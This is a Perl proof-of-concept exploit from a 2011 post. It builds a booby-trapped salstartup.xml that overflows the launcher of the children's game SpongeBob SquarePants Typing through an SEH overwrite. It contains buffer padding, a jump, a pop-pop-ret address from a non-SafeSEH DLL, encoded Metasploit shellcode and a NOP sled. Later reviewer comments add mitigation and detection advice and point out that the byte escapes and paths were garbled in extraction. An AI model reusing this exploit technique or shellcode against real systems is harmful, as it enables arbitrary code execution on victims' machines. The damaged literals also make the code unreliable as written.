
SpongeBob SquarePants Typing Buffer Overflow

Posted on 19 May 2011

# SEH overwrite exploit for SpongeBob SquarePants Typing
# from The Learning Company (http://goo.gl/1EHaD)
# Date: May 4th 2011
# Author: Infant Overflow
#
#      .-.
#     )   (
#     -   -
#   |_____|
#   /     \
#   | ~~~ |
#   | ~~~~~ |
#   | ~~~~~ |
#   | ~~~~~ |
#   \_______/
#
# Fresh out the womb laying the smack down on SpongeBob
# I like my sploits like I like my milk... fresh
#
# Shoutz to Pops, Elmo, my girl Dora, Handy M, and Thomas the Mother f'n Train
#
# Tested on WinXP SP3
#
# NOTE(review): this listing is an extraction of the original post, not the
# code as written: the byte-string literals below have lost their escape
# prefixes and the Windows paths inside the XML have lost their separators,
# so the file is a historical record of the PoC rather than runnable code.
# The author also uses no strictures (no `use strict; use warnings;`).
#
# Defender summary, limited to what the statements below show: the
# launcher's startup file salstartup.xml is written with a <userPath> value
# several kilobytes long, assembled from 1024 bytes of padding, a 4-byte
# "jump" value, a 4-byte handler address taken from mss32.dll (a module the
# author notes was built without /SAFESEH), an encoded payload and a
# 1000-byte single-byte sled.  Mitigation for this class is /SAFESEH on every
# loaded module (or SEHOP, which validates the whole handler chain) plus DEP;
# on the detection side, a salstartup.xml whose <userPath> is kilobytes long
# and made of long single-byte repeats is the signal to look for.

my $diaper = "A" x 1024;    # Everyone needs some padding (reaches the SEH record)
my $jumprope = "xebx06x90x90";    # jump 6 (next-SEH slot; escape prefixes lost in extraction)
my $pacifier = pack('V',0x2110234D);    # pop pop ret from mss32.dll <-- no /SAFESEH sucks like my pacifier!

# windows/exec - 247 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# EXITFUNC=process, CMD=c:windowssystem32calc.exe
# (Encoded payload as posted; opaque by design, the header above is the
# only description of what it does.)
my $shellcode = "xd9xf6xbax24xb5x20x67xd9x74x24xf4x5fx2bxc9" .
"xb1x38x31x57x17x03x57x17x83xcbx49xc2x92xef" .
"x5ax8ax5dx0fx9bxedxd4xeaxaax3fx82x7fx9ex8f" .
"xc0x2dx13x7bx84xc5xa0x09x01xeax01xa7x77xc5" .
"x92x09xb8x89x51x0bx44xd3x85xebx75x1cxd8xea" .
"xb2x40x13xbex6bx0fx86x2fx1fx4dx1bx51xcfxda" .
"x23x29x6ax1cxd7x83x75x4cx48x9fx3ex74xe2xc7" .
"x9ex85x27x14xe2xccx4cxefx90xcfx84x21x58xfe" .
"xe8xeex67xcfxe4xefxa0xf7x16x9axdax04xaax9d" .
"x18x77x70x2bxbdxdfxf3x8bx65xdexd0x4axedxec" .
"x9dx19xa9xf0x20xcdxc1x0cxa8xf0x05x85xeaxd6" .
"x81xcexa9x77x93xaax1cx87xc3x12xc0x2dx8fxb0" .
"x15x57xd2xdexe8xd5x68xa7xebxe5x72x87x83xd4" .
"xf9x48xd3xe8x2bx2dx2bxa3x76x07xa4x6axe3x1a" .
"xa9x8cxd9x58xd4x0exe8x20x23x0ex99x25x6fx88" .
"x71x57xe0x7dx76xc4x01x54x15xd0xa1x20xb3x4a" .
"x3exa0x34xe1xe2x4dxc2x76x6fxd7x59x4bxbdx4b" .
"xc1xcaxadx10x2bx69x56xb2x33";

# XML prefix: everything up to the opening quote of <userPath>.
my $rattle ='<?xml version="1.0" standalone="yes"?> <startup> <userPath>"';

# XML suffix: closes <userPath> and carries the rest of the launcher config
# verbatim (paths as extracted, separators missing).  The literal spans
# three source lines; the embedded line breaks are part of the string.
my $playpen = '"</userPath> <cdName>"SpongeBob SquarePants Typing"</cdName> <cdAge>7-10</cdAge> <music>1000</music> <pdfInstaller>"E:INSTALLACROBATVer50Acrobat Reader 5 Installer.exe"</pdfInstaller> <signin> <execute>yes</execute> <style>tlc</style> <age>4To6</age> <rscFile>default</rscFile> </signin> <disk1> <filename>E:TLC383167-CD</filename> <cdName>"SpongeBob SquarePants Typing"</cdName> </disk1> <screenRSC>salstartup.rsc</screenRSC> <screen> <element> <condition>all</condition> <type>scene</type> <id>9100</id> </element> <element> <condition>all</condition> <type>toon</type> <x>0</x> <y>0</y> <id>9100</id> <startFrame>1</startFrame> </element> <mainPlayButton> <condition>all</condition> <type>fob</type> <class>play</class> <cdCheck>disk1</cdCheck> <target>"C:Program FilesThe Learning CompanySpongeBob SquarePants TypingSPT.exe"</target> <postLaunch>wait</postLaunch> <x>461</x> <y>60</y> <id>9124</id> </mainPlayButton> <helpButton> <condition>all</condition> <type>fob</type> <class>extension</class> <cdCheck></cdCheck> <target>"C:Program FilesThe Learning CompanySpongeBob SquarePants TypingUser&apos;s Guide.pdf"</target> <parameters></parameters> <postLaunch>wait</postLaunch> <x>543</x> <y>158</y> <id>9126</id> </helpButton> <uninstallButton> <condition>all</condition> <type>fob</type> <class>uninstall</class> <target>C:WINDOWSTLCUninstall.exe</target> <parameters>-l</parameters> <crc>"C:Program FilesThe Learning CompanySpongeBob SquarePants TypingUninstall.xml"</crc> <postLaunch>exit</postLaunch> <x>514</x> <y>373</y> <id>9125</id> </uninstallButton> <onlineButton> <condition>all</condition> <type>fob</type> <class>link</class> <cdCheck></cdCheck> <target>http://redirect.expressit.com/redirect.asp?resku=383167&action_id=Launcher</target> <parameters></parameters> <postLaunch>wait</postLaunch> <x>538</x> <y>263</y> <yy>375</yy> <id>9130</id> </onlineButton> 
<EregButton> <condition>all</condition> <type>fob</type> <class>install</class> <cdCheck></cdCheck> <target>"C:Program FilesThe Learning CompanySpongeBob SquarePants Typingeregereg32.exe"</target> <parameters></parameters> <postLaunch>wait</postLaunch> <x>522</x> <y>324</y> <id>9129</id> </EregButton> <SellScreen> <condition>all</condition> <type>fob</type> <class>link</class> <cdCheck>disk1</cdCheck> <target>startup:startup/BrandingPage</target> <parameters></parameters> <postLaunch>wait</postLaunch> <x>543</x> <y>207</y> <id>9128</id> </SellScreen> </screen> <BrandingPage> <element> <condition>all</condition> <type>toon</type> <id>5000</id> </element> <screenSaverButton> <condition>all</condition> <type>fob</type> <class>install</class> <cdCheck>disk1</cdCheck> <target>E:SailorificStuffsbscreen_setup.exe</target> <parameters></parameters> <postLaunch>wait</postLaunch> <x>546</x> <y>188</y> <id>5054</id> </screenSaverButton> <backButton> <condition>all</condition> <type>fob</type> <class>link</class> <target>startup:startup/screen</target> <x>537</x> <y>263</y> <id>5055</id> </backButton> </BrandingPage> <sysReq> <execute>yes</execute> <pc> <processor> <family>pentium</family> <speed>266</speed> <msgType>warn</msgType> <msgText>"266 MHz Pentium or faster is recommended."</msgText> </processor> <os> <Win95>no</Win95> <Win98>yes</Win98> <WinMe>yes</WinMe> <WinNT4>no</WinNT4> <Win2000>yes</Win2000> <WinXP>yes</WinXP> <msgType>warn</msgType> <msgText>"You operating system is not supported. 
Play at your own risk!"</msgText> </os> <diskSpace> <mbAvailable>100</mbAvailable> <msgType>ignore</msgType> <msgText>"There is not enough hard disk space available to play!"</msgText> </diskSpace> <physicalRAM> <mbAvailable>64</mbAvailable> <msgType>warn</msgType> <msgText>"There is not enough RAM available to play!"</msgText> </physicalRAM> <availableRAM> <mbAvailable>64</mbAvailable> <msgType>warn</msgType> <msgText>You are low on memory!</msgText> </availableRAM> <display> <width>800</width> <height>600</height> <bits>16</bits> <msgType>fail</msgType> <msgText>"Your display is not capable of 800 x 600 16-bit, thousands of colors."</msgText> </display> <sound> <msgType>fail</msgType> <msgText>"WAVE driver is not available."</msgText> </sound> </pc> <mac> <processor> <family>ppc</family> <speed>233</speed> <msgType>warn</msgType> <msgText>"233 MHz Powerpc or faster is recommended."</msgText> </processor> <os> <minVersion>0860</minVersion> <msgType>fail</msgType> <msgText>"You must run System 8.6 or above!"</msgText> </os> <osX> <minVersion>1004</minVersion> <msgType>fail</msgType> <msgText>"You must run OSX 10.04 or above!"</msgText> </osX> <diskSpace> <mbAvailable>100</mbAvailable> <msgType>ignore</msgType> <msgText>"There is not enough hard disk space available to play!"</msgText> </diskSpace> <physicalRAM> <mbAvailable>64</mbAvailable> <msgType>warn</msgType> <msgText>"There is not enough RAM available to play!"</msgText> </physicalRAM> <availableRAM> <mbAvailable>0</mbAvailable> <msgType>warn</msgType> <msgText></msgText> </availableRAM> <colorDepth> <minBits>16</minBits> <msgType>warn</msgType> <msgText>"Your display is not capable of 16-bit, thousands of colors."</msgText> </colorDepth> <sound> <available>ignore</available> <msgType>ignore</msgType> <msgText></msgText> </sound> </mac> </sysReq> </startup>';

my $slide = "x90" x 1000;    # 1000-byte sled (escape prefix lost in extraction)

# Writes the assembled config to the current directory.
# NOTE(review): bareword filehandle, 2-arg open and no error check on
# open/print/close, so a failed write is silent; the handle is never closed
# explicitly and is flushed only at interpreter exit.
open(myfile,'>salstartup.xml');
print myfile $rattle.$diaper.$jumprope.$pacifier.$shellcode.$slide.$playpen;

 
